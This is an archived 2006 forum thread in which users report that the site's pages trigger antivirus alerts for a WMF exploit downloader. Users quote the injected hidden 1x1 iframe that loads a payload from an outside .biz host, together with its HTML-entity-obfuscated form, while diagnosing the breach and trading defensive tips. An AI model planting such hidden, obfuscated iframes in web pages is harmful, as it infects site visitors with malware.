Archived

This topic is now archived and is closed to further replies.

Have the forums been hacked?

Recommended Posts

RaisinCain    0

Went to forums to post items for sale, clicked submit new post & BAM! NOD32 is going crazy saying that a trojan is trying to d/l through http. WTF?

Share this post


Link to post
Share on other sites
84Mark    14

Any page that I browse to on the forums I get the following message from SAV:

Scan type: Auto-Protect Scan

Event: Threat Found!

Threat: Downloader

File: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62\xpladv543[1].wmf

Location: C:\Documents and Settings\Mark\Local Settings\Temporary Internet Files\Content.IE5\59Y2FM62

Computer: JEDIMARK

User: Mark

Action taken: Clean failed : Quarantine failed : Access denied

Date found: 08 July 2006 09:55:36

(Please use small sizes for your images - Aaron)

I've scanned my computer and found nothing and it doesn't happen on any other websites?

Share this post


Link to post
Share on other sites
jamend    0

I'm getting this too. A lot of unpatched people are going to get hacked (edit: the WMF exploit was patched post-SP2).

Share this post


Link to post
Share on other sites
Ytterbium    0

Me too, NOD is going nuts

Share this post


Link to post
Share on other sites
iascoot    3

When browsing neowin forums, every page i load says it in infected with Exploit.WMF trojan

SFLKSFNJ!

Connects to site zchxsikpgz.biz

only happens at this forum, no other locations

Share this post


Link to post
Share on other sites
Mx    0

Same here too.

Share this post


Link to post
Share on other sites
Rudy    457

nothing here....points to sig :D

Share this post


Link to post
Share on other sites
iascoot    3

same here, big issues.. just posted about it, refreshed and seen this one

set your browser to higfh security temporary to stop it, just means most scripts wont work

Share this post


Link to post
Share on other sites
84Mark    14

Place zchxsikpgz.biz in your restricted sites in IE.

Share this post


Link to post
Share on other sites
Lowdar    0

I'm in Firefox now, but when I was viewing Neowin in Internet Explorer seven different trojans appeared. :p

Share this post


Link to post
Share on other sites
Ranta    0

McAfee is going crazy, something is definately wrong with neowin.

Share this post


Link to post
Share on other sites
chavo    1

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

Share this post


Link to post
Share on other sites
accesser    1

Yeah I'm getting a pop-up like the ones you get to type text into a site

post-63776-1152349850_thumb.jpg

Share this post


Link to post
Share on other sites
RaisinCain    0

Anyone notify a MOD?

Share this post


Link to post
Share on other sites
iascoot    3

THIS IS IN THE SOURCE NEAR TOP

<iframe src="http://zchxsikpgz.biz/dl/adv543.php" width=1 height=1></iframe>

but is hidden behind other char's

directly under <body>

Share this post


Link to post
Share on other sites
RaisinCain    0

No issues here. Running Konqueror 3.5.2 on Kubuntu 6.06.

It won't affect Linux only Windows users using IE.

Share this post


Link to post
Share on other sites
da13ro    0

Yes, if anyone has contact with a Mod or someone higher, i think the site needs to go into maintnance. Nice spot guys (im on FF)

Share this post


Link to post
Share on other sites
iascoot    3

i PM'ed REDMARK twice but no response,

i posted another post about this in forum issues and it got deleted but this one stayed so SOMEONE knows...

Share this post


Link to post
Share on other sites
84Mark    14

I was going to PM Redmak but then I noticed he was viewing the topic already so I'm sure it will be sorted soon...

Share this post


Link to post
Share on other sites
Rudy    457

It won't affect Linux only Windows users using IE.

he prolly just was being a smartass like i was in my post

Share this post


Link to post
Share on other sites
RaisinCain    0

Check this out.

post-11110-1152350187_thumb.jpg

Share this post


Link to post
Share on other sites
Simon-    490

&lt;iframe src=" 104; 116; 116; 112; 58; 47; 47; 122; 99; 104; 120; 115; 105; 107; 112; 103; 122; 46; 98; 105; 122; 47; 100; 108; 47; 97; 100; 118; 53; 52; 51; 46; 112; 104; 112;" width=1 height=1&gt;&lt;/iframe&gt;

When the HTML entities are decoded (" ;"), it is http://zchxsikpgz.biz/dl/adv543.php

Didn't affect Firefox, had to fire up IE7 Beta 3 to see it, and NOD32 stopped it.

Share this post


Link to post
Share on other sites
John    7

Once that IFRAME is removed, everything should be fine. But how was the forum hacked in the first place???

Share this post


Link to post
Share on other sites
Redmak    323

Can anyone post a selection of the source because I don't see it

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.